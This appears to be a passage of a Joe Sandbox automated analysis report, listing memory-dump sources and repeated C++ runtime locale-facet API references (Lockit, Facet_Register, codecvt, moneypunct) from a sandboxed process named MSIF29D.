                                                                                                                                                                                                                                                                      • API String ID: 1452528299-1782174991
                                                                                                                                                                                                                                                                      APIs
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Maklocstr$Maklocchr
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2020259771-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD883
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD88D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 00FBD8C7
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD8DE
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD8FE
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 743221004-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2301
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC230B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00FC2345
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC235C
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC237C
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 712880209-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2396
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC23A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00FC23DA
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC23F1
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2411
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 712880209-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC24C0
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC24CA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FC2504
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC251B
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC253B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1007100420-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC242B
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2435
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FC246F
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2486
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC24A6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1007100420-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC25EA
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC25F4
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 00FC262E
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2645
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2665
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2750803064-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • ctype.LIBCPMT ref: 00FC2599
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC25B0
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 83828444-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD6C4
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD6CE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00FBD708
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD71F
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD73F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 712880209-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC267F
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2689
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 00FC26C3
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC26DA
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC26FA
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2750803064-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCE8DF
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCE8E9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 00FCE923
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCE93A
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCE95A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2750803064-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCE84A
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCE854
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FCE88E
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCE8A5
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCE8C5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1007100420-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC29FD
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2A07
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC2A41
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2A58
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2A78
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2968
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2972
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC29AC
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC29C3
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC29E3
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEA9E
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEAA8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FCEAE2
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEAF9
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEB19
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2A92
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2A9C
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC2AD6
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2AED
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2B0D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: ced2b18ea3eb914d6193e01037a704f467bd13675c78b5855a7ee32b2a8c130d
                                                                                                                                                                                                                                                                      • Instruction ID: a1b68668a4ae6cace6533c8c24ba32305325a869928b530c6e888d596b8c8bb9
